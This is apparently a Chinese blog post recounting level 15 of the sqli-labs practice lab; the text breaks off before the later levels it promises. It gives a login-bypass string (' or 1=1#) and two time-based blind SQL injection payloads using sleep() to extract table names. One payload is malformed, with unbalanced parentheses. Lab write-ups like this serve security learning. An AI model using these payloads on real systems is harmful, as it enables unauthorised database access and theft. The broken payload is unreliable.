sqli-labs靶场15-19过关小记

level-15

首先判断是否有sql注入攻击,先输入万能密码’ or 1=1# 试了试发现登录成功

可以看到是存在sql注入的,输入单引号后不报错,推断可能是盲注,分析一下源码

可以看到报错信息是被注释的,所以可以采用布尔型或时间型盲注,因为我个人比较喜欢使用时间型盲注,所以可以一步一步推断出数据库,表,字段

然后一个一个爆字段就好啦,因为我这边已经知道库名,如果不知道的话可以使用ascii码一步一步缩小范围确定字符

payload:' and if(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1)='s',sleep(5),1)# 

ascii码payload:admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1)='s',sleep(5),1)#

lev

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值